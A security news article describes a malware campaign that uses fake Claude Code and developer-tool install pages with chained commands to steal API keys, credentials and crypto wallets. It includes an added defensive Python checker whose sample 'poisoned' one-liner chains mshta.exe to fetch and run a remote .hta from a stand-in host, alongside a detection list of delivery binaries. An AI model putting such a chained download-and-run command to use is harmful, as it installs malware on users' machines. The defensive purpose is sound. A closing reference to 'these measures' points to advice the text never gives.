Source: ChatGPT
Fake Claude Code install sites are pushing malware that steals API keys, developer credentials, crypto wallets, and other sensitive data.
Developers searching for Claude Code installation instructions may be walking into a sophisticated malware campaign that masquerades as legitimate AI tooling documentation.
Researchers found dozens of fake Claude Code and developer platform sites designed to steal credentials, API keys, and cryptocurrency.
“The attack chain runs on the same unchecked trust that makes AI developer tools so easy to adopt,” said Straiker researchers in their analysis of the campaign.
They added, “You copy a command. You paste it in your terminal. By then, it’s already too late.”
The campaign has targeted users of popular AI and developer tools, including Claude Code, Cline, JetBrains, Snowflake, and Perplexity Comet, since March 2026.
According to researchers, the operation relies on more than 88 domains hosted across trusted platforms and continuously rotates infrastructure, allowing malicious sites to quickly reappear after takedowns.
To lure victims, threat actors use SEO poisoning, redirect chains, and paid Google advertisements that place fraudulent installation pages above legitimate documentation in search results. These sites closely mimic authentic vendor resources and present installation commands that appear legitimate but contain hidden separators, such as “&”, that execute malicious actions alongside the expected software installation.
In many cases, the legitimate command still runs successfully, helping conceal the compromise.
Researchers observed a variety of delivery techniques, including rundll32.exe loading malicious DLLs, mshta.exe abuse, Base64-encoded commands, GitHub-hosted scripts, and JavaScript-based payloads.
By rotating these methods, attackers improve their ability to evade traditional detection tools.
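As an added example that is not part of the article or of Straiker's analysis: a small Python pre-flight check that splits a copied install one-liner at shell chaining operators such as the "&" separator described above, flags the delivery binaries and encoded-command patterns named in the campaign, and refuses to bless a line it cannot parse. The package name, domains and sample commands are constructed; the check applies POSIX shell quoting rules, so cmd.exe lines are handled only approximately.

```python
import re
import shlex

# Operators that chain a second command onto the one the user expects. A pipe
# ("|") is deliberately left inside the command: "curl ... | sh" is the normal
# shape of many legitimate installers and is not by itself a hidden separator.
CHAIN_OPERATORS = {"&", "&&", ";", "||"}

# Living-off-the-land binaries the campaign above was observed using for delivery.
SUSPICIOUS_BINARIES = {"rundll32.exe", "rundll32", "mshta.exe", "mshta"}

# Flags that hand an interpreter an encoded script instead of readable commands.
ENCODED_RE = re.compile(r"(?:^|\s)-enc(?:odedcommand)?\b|base64\s+(?:-d|--decode)\b", re.I)


def shell_tokens(command: str) -> list[str]:
    """Tokenise like a POSIX shell; operators such as '&&' come back as their own tokens."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)  # raises ValueError on unbalanced quoting


def split_chained_commands(command: str) -> list[str]:
    """Return the separate commands the shell would run for this one-liner."""
    commands, current = [], []
    for tok in shell_tokens(command):
        if tok in CHAIN_OPERATORS:
            if current:
                commands.append(" ".join(current))
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(" ".join(current))
    return commands


def audit_install_command(command: str) -> list[str]:
    """Return findings for a copied install line; an empty list means nothing was flagged."""
    findings = []
    if "\n" in command or "\r" in command:
        findings.append("paste spans several lines; every line will execute")
    try:
        commands = split_chained_commands(command)
        tokens = shell_tokens(command)
    except ValueError as exc:  # do not run what you cannot parse
        return findings + [f"unparseable command: {exc}"]
    for extra in commands[1:]:  # anything after the first command rode in on a separator
        findings.append(f"hidden second command: {extra!r}")
    for tok in tokens:
        if tok.rsplit("/", 1)[-1].rsplit("\\", 1)[-1].lower() in SUSPICIOUS_BINARIES:
            findings.append(f"delivery binary referenced: {tok}")
    if ENCODED_RE.search(command):
        findings.append("encoded script passed to the interpreter")
    return findings


# Constructed samples: a clean install line and one that chains an extra download behind "&".
CLEAN = "npm install -g example-cli"
POISONED = "npm install -g example-cli & mshta.exe https://installer.example.invalid/run.hta"
```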
Unlike typical infostealers, this campaign targets AI assets, including API keys, authentication tokens, and cloud development credentials, from tools such as Cline and Continue[.]dev.
Once executed, the malware deploys a multi-stage infection chain featuring encrypted C2 communications, fileless execution techniques, anti-analysis capabilities, and credential theft functionality.
Researchers identified the primary payload as ACRStealer, an information-stealing malware family that has evolved to incorporate advanced encryption and evasion mechanisms. The malware can steal AI credentials, browser passwords, password manager data, VPN credentials, cryptocurrency wallets, messaging app data, and sensitive files.
Researchers also found a cryptocurrency clipboard hijacker that redirects transactions by replacing copied wallet addresses.
Attacks like this often rely on trusted platforms, legitimate-looking documentation, and valid installation commands, so traditional security awareness training alone may not be enough to prevent compromise.
Collectively, these measures can help organizations reduce exposure to credential theft and malicious downloads.
Editor’s note: This article originally appeared on our sister publication, eSecurityPlanet.